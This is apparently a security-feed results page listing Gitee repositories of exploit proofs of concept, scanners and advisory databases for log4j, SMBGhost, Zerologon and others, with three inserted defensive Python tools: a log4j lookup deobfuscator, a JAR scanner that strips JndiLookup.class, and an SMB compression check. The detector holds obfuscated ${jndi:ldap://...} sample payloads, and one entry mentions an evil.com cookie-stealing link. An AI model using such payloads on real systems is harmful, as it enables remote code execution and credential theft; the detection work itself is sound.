1899 matches found

Gitee | added 2025/09/06 2:53 p.m. | 77 views

sudo_inject

Linux privilege escalation by injecting into processes that hold valid sudo tokens: inject a process that has a valid sudo token and activate our own sudo token. Introduction: we have all noticed that sometimes sudo doesn't ask us for a password because it remembers us. How does it remember us, and how does it identifie...

AI score 7.6 | Exploits 0
Gitee | added 2025/09/06 2:18 p.m. | 71 views

awesome-windows-exploitation

This is a curated list of Windows exploitation resources and tools. The list is organized by category, including Windows stack overflows, Windows heap overflows, kernel-based Windows overflows, Windows kernel memory corruption, return-oriented programming, Windows memory protections, bypassing...

AI score 6.8 | Exploits 0
Gitee | added 2025/09/06 2:15 p.m. | 83 views

Exploit for CVE-2015-1805

This repository contains a collection of exploits for several Linux kernel vulnerabilities, including CVE-2015-1805, CVE-2017-7184, CVE-2017-2636, and CVE-2017-8890. The exploits are written in C and demonstrate the vulnerabilities in the Linux kernel. CVE-2015-1805 is a vulnerability in the...

CVSS 7.8 | AI score 8.6 | EPSS 0.09009 | Exploits 11
Gitee | added 2025/09/06 1:01 p.m. | 66 views

Exploit for Observable Discrepancy in Intel Atom_C

This is a tool for checking the state of software mitigations against the Spectre and Meltdown vulnerabilities. It uses the NtQuerySystemInformation API call to report the data as seen by the Windows kernel. The tool is currently optimized for Microsoft Windows 7-10 and uses the best-working exploit...

CVSS 5.6 | AI score 6.5 | EPSS 0.9427 | Exploits 12
Gitee | added 2025/09/06 12:44 p.m. | 181 views

internalblue

InternalBlue is an offensive Bluetooth experimentation framework for Broadcom and Cypress chips. It enables features that would otherwise only be possible with a full-stack software-defined radio implementation, such as injecting and monitoring packe...

AI score 7 | Exploits 0
Gitee | added 2025/09/06 12:44 p.m. | 91 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

CVE-2021-44228 Log4j2 log-content JNDI RCE mitigation. English version. International mirror: https://github.com/zhangyoufu/log4j2-without-jndi; China mirror: https://code.aliyun.com/zhangyoufu/log4j2-without-jndi/tree/master. Usage: 1. Locate the log4j2-core component under the deployment directory: find . -name 'log4j-core.jar' 2. Apply the mitigation to each log4j2-core JAR found. Method 1: with the zip command, from the JAR...

CVSS 10 | AI score 8.7 | EPSS 0.94358 | Exploits 341
Gitee | added 2025/09/06 12:43 p.m. | 81 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

This repository contains Nmap NSE (Nmap Scripting Engine) scripts designed to check various services for the log4shell/LogJam vulnerability, CVE-2021-44228. The scripts are written in Lua and are intended to be used with the Nmap network scanner. The scripts are categorized into different...

CVSS 10 | AI score 7.4 | EPSS 0.94358 | Exploits 341
Gitee | added 2025/09/06 12:43 p.m. | 92 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

Log4J-RCE-Proof-Of-Concept, CVE-2021-44228. This is a proof of concept of the log4j RCE. Links for CVE-2021-44228: https://www.lunasec.io/docs/blog/log4j-zero-day, https://github.com/advisories/GHSA-jfh8-c2jp-5v3q, https://github.com/apache/logging-log4j2/pull/608,...

CVSS 10 | AI score 9.2 | EPSS 0.94358 | Exploits 341
Gitee | added 2025/09/06 12:42 p.m. | 87 views

Exploit for OS Command Injection in Apache Airflow

This is a proof-of-concept (PoC) exploit for CVE-2020-11978, a remote code execution (RCE) vulnerability in Apache Airflow's example DAGs. The exploit targets Airflow versions below 1.10.11 and allows an attacker to execute arbitrary commands on the system. The exploit uses the Airflow Experiment...

CVSS 8.8 | AI score 9.6 | EPSS 0.94272 | Exploits 9
Gitee | added 2025/09/06 12:40 p.m. | 67 views

PayloadsAllTheThings

An offensive resource for web application security and pentest/CTF work: this repository contains a list of useful payloads and bypass techniques for web application security testing and penetration testing/CTF. The payloads are used for testing and exploiting vulnerabilities in web applications. The...

AI score 7 | Exploits 0
Gitee | added 2025/09/06 12:10 p.m. | 0 views

Exploit for Path Traversal in Wso2 Api_Manager

CVE-2022-29464 WSO2 RCE: a CVE-2022-29464 exploit. Details: CVE-2022-29464 is a critical vulnerability in WSO2 discovered by Orange Tsai. The vulnerability is an unauthenticated, unrestricted arbitrary file upload which allows unauthenticated attackers to gain RCE on WSO2 servers by uploading...

CVSS 10 | EPSS 0.94434 | Exploits 22
Gitee | added 2025/09/06 12:09 p.m. | 88 views

vulhub

This is a pre-built vulnerable environment based on Docker Compose, provided by the Vulhub project. The repository contains a collection of vulnerable applications and services, along with their corresponding Dockerfiles and configuration files. The vulnerable environments are designed to help...

AI score 7 | Exploits 0
Gitee | added 2025/09/06 12:09 p.m. | 84 views

ProxyVulns

ProxyVulns. ProxyLogon usage: python3 26855.py 1.1.1.1. ProxyOracle (url): once a victim clicks this link, evil.com will receive the cookies...

AI score 6.9 | Exploits 0
Gitee | added 2025/09/06 12:09 p.m. | 101 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

LOG4J Java exploit - WAF and patches bypass tricks. Description: CVE-2021-44228 works on: log4j 2.0. Upper Lookup: the UpperLookup converts the passed-in argument to upper case. Presumably the...

CVSS 10 | AI score 9 | EPSS 0.94358 | Exploits 346
Gitee | added 2025/09/06 12:09 p.m. | 62 views

TI_Dos_Framework

This is a comprehensive web-app audit framework called TIDoS Framework. It is a Python-based tool that provides a wide range of modules for reconnaissance, scanning, enumeration, vulnerability analysis, and exploitation. The framework is designed to be user-friendly and provides a simple interfac...

AI score 7 | Exploits 0
Gitee | added 2025/09/06 12:09 p.m. | 104 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

CVE-2021-44228 Remote Code Injection in Log4j, https://twitter.com/jas502n/status/1468946197629272066. Spring Boot pom.xml default use: org.springframework.boot spring-boot-starter-web; mvn dependency:tree shows: [INFO] | | +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile [IN...

CVSS 10 | AI score 7.7 | EPSS 0.94358 | Exploits 341
Gitee | added 2025/09/06 12:09 p.m. | 137 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

log4j-shell-poc: a proof of concept for the recently found CVE-2021-44228 vulnerability. Recently there was a new vulnerability in log4j, a Java logging library that is very widely used in the likes of Elasticsearch, Minecraft and numerous others. In this repository we have made an example...

CVSS 10 | AI score 7 | EPSS 0.94358 | Exploits 341
Gitee | added 2025/09/06 12:09 p.m. | 128 views

Exploit for Path Traversal in Mikrotik Routeros

This is a PoC exploit for CVE-2018-14847 targeting RouterOS-based routers. The tool, named Meris RouterOS Checker, checks a list of IP addresses to validate whether they were infected with Meris. It uses the RouterOS API, SSH, and WinBox to connect to the routers and attempts to exploit the...

CVSS 9.1 | AI score 6.9 | EPSS 0.93645 | Exploits 23
Gitee | added 2025/09/06 12:09 p.m. | 73 views

Exploit for OS Command Injection in Sixapart Movable_Type

cve-2021-20837-poc: PoC for CVE-2021-20837, RCE in Movable Type. This vulnerability was discovered in collaboration with The.Criminal.One, who developed this PoC. Blog post: https://nemesis.sh/posts/movable-type-0day/...

CVSS 9.8 | AI score 9.3 | EPSS 0.94187 | Exploits 11
Gitee | added 2025/09/06 12:08 p.m. | 72 views

log4shell-detector

The file summarized here is the project's Gradle wrapper script rather than the detector itself. Purpose: the script starts a Gradle build. License: the script is licensed under the Apache License, Version 2.0. Functionality: the script sets up the environment for the Gradle build...

AI score 6.9 | Exploits 0
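The WAF-bypass entry above (UpperLookup and friends) and this detector entry turn on the same mechanism: log4j resolves nested lookups innermost-first, so `${${lower:j}ndi:...}` reaches the JNDI lookup intact while a naive string match for `${jndi:` misses it. What follows is an added example, not code from either repository: a resolver for the lookup forms named on this page (lower, upper and the `:-` default value) that de-obfuscates constructed log lines before matching. The sample lines and hosts are made up, and the lookup set is deliberately partial, so anything it leaves unresolved deserves a look rather than a pass.

```python
"""Added example: de-obfuscate nested log4j 2 lookups in log lines, then match for ${jndi:...}.
Models only lower/upper/default-value lookups; everything else is passed through as a literal."""
import re

MAX_DEPTH = 16
JNDI_RE = re.compile(r"\$\{\s*jndi:([^}]*)", re.IGNORECASE)


def _match_close(s, start):
    """Index of the '}' closing the '${' at `start`, tracking nesting; -1 if unbalanced."""
    depth, i = 0, start
    while i < len(s):
        if s.startswith("${", i):
            depth += 1
            i += 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def _resolve(inner):
    """Evaluate one lookup body whose nested lookups have already been resolved."""
    low = inner.lower()
    if low.startswith("jndi:"):
        return "${" + inner + "}"          # never evaluated here: this is what we want to surface
    if low.startswith("lower:"):
        return inner[6:].lower()
    if low.startswith("upper:"):
        return inner[6:].upper()
    if ":-" in inner:
        # ${name:-default}: a name with no value (env:NOPE, sys:NOPE, or empty) yields the
        # default, which is how ${::-j} and ${env:BARFOO:-j} both become "j"
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"              # unknown lookup (date, ctx, ...): keep literal


def deobfuscate(s, _depth=0):
    """Innermost-first rewrite of nested ${...} lookups, the order log4j's StrSubstitutor uses."""
    if _depth > MAX_DEPTH:
        return s
    out, i = [], 0
    while i < len(s):
        if s.startswith("${", i):
            j = _match_close(s, i)
            if j == -1:
                out.append(s[i:])
                break
            out.append(_resolve(deobfuscate(s[i + 2:j], _depth + 1)))
            i = j + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def inspect_line(line):
    """Resolved text plus the JNDI scheme and target when the line carries a lookup."""
    resolved = deobfuscate(line)
    m = JNDI_RE.search(resolved)
    if not m:
        return {"jndi": False, "resolved": resolved, "scheme": None, "target": None}
    target = m.group(1).strip()
    scheme = target.split("://", 1)[0].lower() if "://" in target else None
    return {"jndi": True, "resolved": resolved, "scheme": scheme, "target": target}


# Constructed sample lines (not a real capture); hosts are from documentation address ranges.
SAMPLE_LINES = [
    'GET / HTTP/1.1 User-Agent: ${jndi:ldap://198.51.100.7:1389/a}',
    'X-Api-Version: ${${lower:j}${upper:n}d${::-i}:${lower:LDAP}://203.0.113.5/x}',
    'Referer: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//203.0.113.5/x}',
    'Host: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9:1099/obj}',
    '2021-12-10T10:00:00Z INFO user=alice action=login src=10.0.0.5',
    'Report for ${date:yyyy-MM-dd} generated',
]


def scan_lines(lines):
    """Only the lines that resolve to a JNDI lookup, with the de-obfuscated form for triage."""
    return [dict(line=l, **inspect_line(l)) for l in lines if inspect_line(l)["jndi"]]


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        print(f"{hit['scheme']:<5} {hit['target']:<32} <- {hit['line']}")
```

Run it over a web or application log and triage by the resolved form: the scheme (ldap, ldaps, rmi, dns) and target host are what the outbound-connection logs should be checked against. A WAF that matches the raw line sees none of lines 2 to 4 as `${jndi:`; the resolver does.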
Gitee | added 2025/09/06 12:07 p.m. | 151 views

Exploit for Use After Free in Google Android

This is a proof-of-concept (PoC) exploit for CVE-2019-2215, a use-after-free vulnerability in the Android kernel. The exploit is designed to demonstrate the vulnerability and its potential impact on the system. The PoC exploit is written in C++ and built with the Clang compiler. It includes a function...

CVSS 7.8 | AI score 7.1 | EPSS 0.51467 | Exploits 26
Gitee | added 2025/09/06 12:06 p.m. | 74 views

poc

Proof of Concepts. As a result of plugin writing or general bug hunting, researchers at Tenable often stumble upon new and interesting vulnerabilities. These vulnerabilities are shared with the community on our company blog, Medium, or through our research advisories. We've decided to...

AI score 7.5 | Exploits 0
Gitee | added 2025/09/06 12:06 p.m. | 101 views

metasploit-framework

This is a Metasploit Framework repository. The Metasploit Framework is an open-source penetration testing platform used for identifying vulnerabilities in computer systems and applications. It is a comprehensive toolset for security professionals to simulate attacks and test defenses. The...

AI score 7.2 | Exploits 0
Gitee | added 2025/09/06 11:52 a.m. | 82 views

exifcleaner

Cross-platform desktop GUI app to clean image metadata...

AI score 6.9 | Exploits 0
Gitee | added 2025/09/06 11:51 a.m. | 132 views

Exploit for CVE-2020-1472

CVE-2020-1472 - Zerologon vulnerability, Python implementation. Description: a Python script which uses the Impacket library to test for CVE-2020-1472 (Zerologon); credit to Secura's research. The flaw stems from the Netlogon Remote Protocol, available...

CVSS 10 | AI score 8.1 | EPSS 0.9438 | Exploits 75
Gitee | added 2025/09/06 11:51 a.m. | 119 views

Scanners-Box

This is a collection of open-source scanners from the GitHub platform, including subdomain enumeration, database vulnerability scanners, weak password or information leak scanners, port scanners, fingerprint scanners, and other large-scale scanners. The collection is maintained by We5ter and...

AI score 7.8 | Exploits 0
Gitee | added 2025/09/06 11:51 a.m. | 78 views

Exploit for CVE-2018-3149

log4j2-exploits (demo video: https://user-images.githubusercontent.com/37479424/145661983-131eb84a-9ac5-4014-9f6b-10b69d8d7cf4.mp4). The underlying vulnerability was reported as CVE-2018-3149 and patched (see the 8u121 Release Notes). However, the Java logging library log4j2 had JNDILookup,...

CVSS 8.3 | AI score 7.4 | EPSS 0.00727 | Exploits 2
Gitee | added 2025/09/06 11:51 a.m. | 79 views

InfiniteWP-exploit

This is an exploit module for InfiniteWP Client 1.9.4.5 - Authentication Bypass. No primary CVE ID is stated; the exploit is based on the vulnerability disclosed at https://0day.work/infinitewp-client-1-9-4-5-authentication-bypass/. The target product is InfiniteWP Client,...

AI score 6.9 | Exploits 0
Gitee | added 2025/09/06 11:51 a.m. | 143 views

Exploit for OS Command Injection in Hikvision Ds-2Cd2026G2-Iu\/Sl_Firmware

This is a PoC exploit for CVE-2021-36260, a command injection vulnerability in the web server of some Hikvision products. The vulnerability allows an attacker to launch a command injection attack by sending malicious commands to the device. The exploit is implemented in Python and provides several...

CVSS 9.8 | AI score 8.9 | EPSS 0.94436 | Exploits 22
Gitee | added 2025/09/06 11:51 a.m. | 72 views

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android

This repository contains proof-of-concept (PoC) code for the BlueBorne vulnerabilities. BlueBorne is a set of vulnerabilities in Bluetooth stack implementations that allow an attacker to remotely execute code on a device. The vulnerabilities were discovered in 2017 and...

CVSS 8.8 | AI score 7.4 | EPSS 0.42427 | Exploits 19
Gitee | added 2025/09/06 11:50 a.m. | 69 views

Exploit for Improper Input Validation in Vmware Vcenter_Server

No description provided...

CVSS 10 | AI score 7 | EPSS 0.94412 | Exploits 13
Gitee | added 2025/09/06 11:36 a.m. | 130 views

vuls

This is an open-source vulnerability scanner for Linux and FreeBSD, written in Go. It is an agentless scanner, meaning it does not require any additional software to be installed on the target systems. The scanner is designed to be easy to use and provides a simple command-line interface. The...

AI score 7 | Exploits 0
Gitee | added 2025/09/06 10:57 a.m. | 99 views

Exploit for Insufficiently Protected Credentials in Linuxfoundation Containerd

This repository is a collection of offensive resources for Kubernetes: articles, videos, and presentations on methods to attack and exploit Kubernetes clusters, covering topics such as securing clusters by eliminating risky permissions, Kubernetes pentest methodology, and container...

CVSS 6.1 | AI score 6 | EPSS 0.00846 | Exploits 1
Gitee | added 2025/09/06 9:50 a.m. | 88 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

PoC exploit for CVE-2021-44228, a vulnerability in the Apache Log4j Java logging library. Vulnerability class/vector: RCE (remote code execution) via JNDI (Java Naming and Directory Interface) lookup. The probable entry points are JNDI lookups...

CVSS 10 | AI score 8.7 | EPSS 0.94358 | Exploits 341
Gitee | added 2025/09/06 9:19 a.m. | 93 views

advisory-db

This is a security advisory database for Rust crates published through crates.io. The database is stored in TOML format and contains information about security advisories filed against various Rust crates. The advisories include details such as the affected package, patched versions, and a...

AI score 6.9 | Exploits 0
Gitee | added 2025/09/06 8:33 a.m. | 62 views

CUSEC-2020

Classification: this is an Insecure Direct Object Reference (IDOR) bug. Background: the bug occurs when the application does not verify that the current user is authorized to access a resource with a specific ID. In this cas...

AI score 7.1 | Exploits 0
Gitee | added 2025/09/06 8:23 a.m. | 73 views

DependencyCheck

This is an open-source software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies. The project is called OWASP dependency-check. It is written in Java and designed to be used in a variety of environments, including...

AI score 7 | Exploits 0
Gitee | added 2025/09/06 8:22 a.m. | 79 views

Exploit for Improper Initialization in Linux Linux_Kernel

This is a PoC exploit for the Dirty Pipe vulnerability, CVE-2022-0847, on Android, specifically targeting Pixel 6 devices with a security patch level from 2022-02-05 to 2022-04-05. The exploit overwrites readable files but cannot write the first byte of each 4096-byte page. I...

CVSS 7.8 | AI score 7.4 | EPSS 0.81981 | Exploits 99
Gitee | added 2025/09/06 5:53 a.m. | 155 views

Exploit for CVE-2015-4335

This is a PoC exploit for CVE-2015-4335, a Redis Lua sandbox escape and arbitrary code execution vulnerability. The tool, named redischeck, checks a Redis instance for security weaknesses. It performs three checks: (1) whether the AUTH command is set, (2) whether the CONFIG command has been renamed, and (3)...

CVSS 10 | AI score 8.4 | EPSS 0.08757 | Exploits 2
Gitee | added 2025/09/06 5:41 a.m. | 79 views

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

This is a PoC exploit for CVE-2021-44228, a remote code execution vulnerability in the Apache Log4j logging library. The repository, mirrorsyahoo/check-log4j, contains a tool called check-log4j that attempts to determine if a host is vulnerable by looking for the presence of...

CVSS 10 | AI score 9.1 | EPSS 0.94358 | Exploits 341
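The mitigation entry for zhangyoufu/log4j2-without-jndi (find log4j-core.jar, then delete the class with zip) and the check-log4j entry above reduce to one question: which archives on this host still contain org/apache/logging/log4j/core/lookup/JndiLookup.class? The following is an added example, not code from either project: a scan that opens every jar/war/ear, looks inside (including jars nested in a war and shaded uber-jars, which a file-name search for log4j-core misses), reports the log4j-core version from the embedded Maven pom.properties, and strips the class the way `zip -q -d` does. The fixture tree is constructed with dummy class bytes; the paths and versions in it are made up.

```python
"""Added example: find archives that still ship JndiLookup.class and strip it.
Not the zhangyoufu/log4j2-without-jndi or check-log4j code; make_fixture() is a constructed tree."""
import io
import os
import shutil
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")


def _log4j_core_version(zf):
    """Version from the Maven pom.properties embedded in a log4j-core build; None if absent."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def _contains_jndi_lookup(zf, depth=0):
    """True if the class is in this archive or in a jar nested one level down (e.g. WEB-INF/lib)."""
    names = zf.namelist()
    if JNDI_CLASS in names:
        return True
    if depth > 0:
        return False
    for name in names:
        if name.lower().endswith(".jar"):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    if _contains_jndi_lookup(inner, depth + 1):
                        return True
            except zipfile.BadZipFile:
                continue
    return False


def scan(root):
    """Every jar/war/ear under root, keyed by absolute path. Looks inside each archive, so shaded
    uber-jars and wars that bundle log4j under another file name are reported too."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as zf:
                    report[path] = {"rel": Path(path).relative_to(root).as_posix(),
                                    "version": _log4j_core_version(zf),
                                    "jndi": _contains_jndi_lookup(zf)}
            except zipfile.BadZipFile:
                continue
    return report


def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (what `zip -q -d` does), keeping a .bak copy.
    Handles a top-level entry only; a nested jar needs the outer archive unpacked and repacked."""
    shutil.copy2(jar_path, jar_path + ".bak")
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_CLASS not in zf.namelist()


def make_fixture():
    """Constructed tree for the offline demo: real entry names, dummy class bytes, not real log4j."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    dummy = b"\xca\xfe\xba\xbe"
    with zipfile.ZipFile(os.path.join(lib, "log4j-core-2.14.1.jar"), "w") as zf:
        zf.writestr(POM_PROPS, "version=2.14.1\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, dummy)
        zf.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class", dummy)
    with zipfile.ZipFile(os.path.join(lib, "commons-io-2.11.0.jar"), "w") as zf:
        zf.writestr("org/apache/commons/io/IOUtils.class", dummy)
    with zipfile.ZipFile(os.path.join(root, "app", "uber-app.jar"), "w") as zf:
        zf.writestr("app/Main.class", dummy)
        zf.writestr(JNDI_CLASS, dummy)  # shaded log4j: no log4j-core file name for find to match
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as nested:
        nested.writestr(JNDI_CLASS, dummy)
    with zipfile.ZipFile(os.path.join(root, "app", "site.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.11.2.jar", inner.getvalue())
    return root


if __name__ == "__main__":
    tree = make_fixture()
    for path, info in sorted(scan(tree).items()):
        print(f"{info['rel']:34} version={info['version']} jndi={info['jndi']}")
        if info["jndi"] and path.endswith(".jar"):
            print("  stripped:", remove_jndi_lookup(path))
```

Point `scan()` at a real deployment root to get the inventory; strip only after the application is stopped, and keep the `.bak` until it restarts cleanly, since removing the class makes any configuration that references a JNDI lookup fail at startup. Class removal is the fallback for versions too old for the upgrade path; upgrading log4j-core remains the actual fix.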
Gitee | added 2025/09/06 4:56 a.m. | 84 views

MaraDNS

MaraDNS is an open-source DNS server. It is a small, lightweight, and highly customizable DNS server that can be used as an authoritative or recursive nameserver. MaraDNS is written in C and is designed to be easy to configure and use. The repository contains a variety of files, including a READM...

AI score 6.7 | Exploits 0
Gitee | added 2025/09/06 4:33 a.m. | 90 views

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

SMBGhost: simple scanner for CVE-2020-0796, SMBv3 RCE. The scanner is meant only for testing whether a server is vulnerable. It is not meant for research or development, hence the fixed payload. It checks for SMB dialect 3.1.1 and compression capability through a negotiate request. A network...

CVSS 10 | AI score 9 | EPSS 0.94424 | Exploits 124
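The scanner above describes exactly one check: negotiate SMB 3.1.1 and see whether the server advertises a compression algorithm. Below is an added example, not the scanner's own code: the request builder and response parser for that check, following the MS-SMB2 NEGOTIATE layout, exercised offline against constructed replies (`build_sample_response` is a fixture written for this example, not a capture). One caveat the entry does not state: the March 2020 fix corrects the decompression code and leaves the capability advertised, while the DisableCompression registry workaround removes it, so a positive result means the exposed feature is on, not that the host is unpatched.

```python
"""Added example: negotiate-based SMBGhost (CVE-2020-0796) exposure check built from the MS-SMB2
wire layout. Not the scanner's own code; build_sample_response() is a constructed fixture."""
import socket
import struct
import uuid

SMB2_NEGOTIATE = 0x0000
DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001
CTX_COMPRESSION = 0x0003
SHA512 = 0x0001
LZNT1 = 0x0001
ALGO_NAMES = {0x0001: "LZNT1", 0x0002: "LZ77", 0x0003: "LZ77+Huffman", 0x0004: "Pattern_V1"}

def _header():
    # 64-byte SMB2 header: ProtocolId, StructureSize, CreditCharge, Status, Command, Credits,
    # Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, then a 16-byte Signature
    return b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, SMB2_NEGOTIATE, 1, 0, 0, 0, 0, 0, 0) + b"\x00" * 16

def _context(ctype, data):
    # NEGOTIATE_CONTEXT: ContextType, DataLength, Reserved, Data
    return struct.pack("<HHI", ctype, len(data), 0) + data

def _pad8(b):
    return b + b"\x00" * ((-len(b)) % 8)

def _nbss(msg):
    # NetBIOS session service framing: type 0x00 followed by a 24-bit big-endian length
    return struct.pack(">I", len(msg)) + msg

def build_negotiate_request(client_guid=None, salt=b"\x00" * 32):
    """NEGOTIATE offering only 3.1.1, with the mandatory preauth-integrity context and a compression
    context, so a server that supports compression has to say so in its reply."""
    guid = client_guid or uuid.uuid4().bytes
    dialects = struct.pack("<H", DIALECT_311)
    ctx_offset = 64 + 36 + len(dialects)
    pad = (-ctx_offset) % 8                       # the context list starts 8-byte aligned
    ctx_offset += pad
    preauth = _context(CTX_PREAUTH_INTEGRITY, struct.pack("<HHH", 1, len(salt), SHA512) + salt)
    compression = _context(CTX_COMPRESSION, struct.pack("<HHIH", 1, 0, 0, LZNT1))
    body = struct.pack("<HHHHI16sIHH", 36, 1, 0x0001, 0, 0, guid, ctx_offset, 2, 0)
    return _nbss(_header() + body + dialects + b"\x00" * pad + _pad8(preauth) + compression)

def parse_negotiate_response(data):
    """Dialect and advertised compression algorithms from a NEGOTIATE response (NetBIOS framing optional)."""
    if data[:1] == b"\x00" and data[4:8] == b"\xfeSMB":
        data = data[4:]
    if data[:4] != b"\xfeSMB" or struct.unpack_from("<H", data, 12)[0] != SMB2_NEGOTIATE:
        raise ValueError("not an SMB2 NEGOTIATE response")
    _, _, dialect, ctx_count = struct.unpack_from("<HHHH", data, 64)
    ctx_offset = struct.unpack_from("<I", data, 64 + 60)[0]
    algorithms, has_ctx, off = [], False, ctx_offset
    for _ in range(ctx_count if dialect == DIALECT_311 else 0):   # contexts exist only for 3.1.1
        ctype, dlen = struct.unpack_from("<HH", data, off)
        payload = data[off + 8:off + 8 + dlen]
        if ctype == CTX_COMPRESSION:
            has_ctx = True
            count = struct.unpack_from("<H", payload, 0)[0]
            algorithms = [ALGO_NAMES.get(a, hex(a)) for a in struct.unpack_from("<%dH" % count, payload, 8)]
        off += 8 + dlen + ((-(8 + dlen)) % 8)      # next context is 8-byte aligned
    return {"dialect": dialect, "compression_context": has_ctx, "algorithms": algorithms}

def exposed(info):
    """The scanner's condition: 3.1.1 negotiated and at least one compression algorithm advertised."""
    return info["dialect"] == DIALECT_311 and bool(info["algorithms"])

def probe(host, port=445, timeout=5):
    """Live check against a host (not exercised offline); reads one NetBIOS-framed reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        head = s.recv(4)
        need = struct.unpack(">I", head)[0] & 0xFFFFFF
        body = b""
        while len(body) < need:
            chunk = s.recv(need - len(body))
            if not chunk:
                break
            body += chunk
    return parse_negotiate_response(head + body)

def build_sample_response(dialect, algorithms):
    """Constructed server reply for the offline demo; its context list starts at offset 128."""
    body = struct.pack("<HHHH", 65, 0x0001, dialect, 1 if algorithms else 0) + b"\x00" * 16
    body += struct.pack("<IIII", 0, 0x800000, 0x800000, 0x800000) + b"\x00" * 16
    body += struct.pack("<HHI", 0, 0, 128 if algorithms else 0)
    ctx = b""
    if algorithms:
        n = len(algorithms)
        ctx = _context(CTX_COMPRESSION, struct.pack("<HHI%dH" % n, n, 0, 0, *algorithms))
    return _nbss(_header() + body + ctx)

if __name__ == "__main__":
    for label, reply in [("3.1.1 + LZNT1", build_sample_response(DIALECT_311, [LZNT1])),
                         ("3.1.1, no compression", build_sample_response(DIALECT_311, [])),
                         ("3.0.2", build_sample_response(0x0302, [LZNT1]))]:
        info = parse_negotiate_response(reply)
        print(f"{label:22} dialect=0x{info['dialect']:04x} algorithms={info['algorithms']} exposed={exposed(info)}")
```

`probe(host)` runs the same check against a live server. The negotiate exchange is unauthenticated and harmless, which is what makes it usable for fleet-wide inventory; confirming patch state still needs the KB level or a decompression-based check.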
Gitee | added 2025/09/06 4:26 a.m. | 82 views

MaraDNS_1

This is a repository for MaraDNS, a small open-source DNS server. The repository contains various files and scripts for building and testing MaraDNS, including a Dockerfile for creating a Docker image to test installing MaraDNS on a fresh Ubuntu 22.04 virtual machine. The repository includes a...

AI score 7.1 | Exploits 0
Gitee | added 2025/09/06 4:25 a.m. | 66 views

vulnerabilitydb

This is a public vulnerability database repository for Snyk, a tool that helps find and fix known vulnerabilities in Node.js dependencies. The repository contains a list of folders for vulnerable npm packages, each with a subfolder for a specific date (YYYYMMDD) containing data files. The data is...

AI score 6.9 | Exploits 0
Gitee | added 2025/09/06 4:17 a.m. | 111 views

Exploit for Use After Free in Google Android

This is a proof-of-concept (PoC) application demonstrating the power of an Android kernel arbitrary R/W primitive, specifically targeting CVE-2019-2215. The application, named Qu1ckR00t, is designed to exploit this vulnerability to achieve root access on an Android device. The exploit is implemented in the...

CVSS 7.8 | AI score 8.6 | EPSS 0.51467 | Exploits 26
Gitee | added 2025/09/06 3:49 a.m. | 107 views

ossindex-maven-plugin

This is a Maven plugin for dependency auditing. No primary CVE ID is present in the provided context. Target product/framework: Maven; vulnerability class/vector: dependency audit. Notable dependencies/tooling: the OSS Index REST API v2.0. The execution contex...

AI score 6.8 | Exploits 0
Gitee | added 2025/09/06 2:57 a.m. | 138 views

shellshocker-pocs

This is a collection of proof-of-concepts (PoCs) and potential targets for the ShellShocker vulnerability. The PoCs are designed to exploit the vulnerability in various products and services, including XMPP (ejabberd), Mailman, MySQL, NFS, Bind9, FTP, and others. The PoCs are primarily focused on...

AI score 8.3 | Exploits 0
Gitee | added 2025/09/06 2:37 a.m. | 85 views

ruby-advisory-db

This is a database of security advisories for Ruby libraries, maintained by the ruby-advisory-db project. The database contains a list of directories that match the names of Ruby libraries on rubygems.org, with each directory containing one or more advisory files for the library. Each advisory fi...

AI score 6.7 | Exploits 0
Gitee | added 2025/09/06 2:36 a.m. | 92 views

graphql-playground

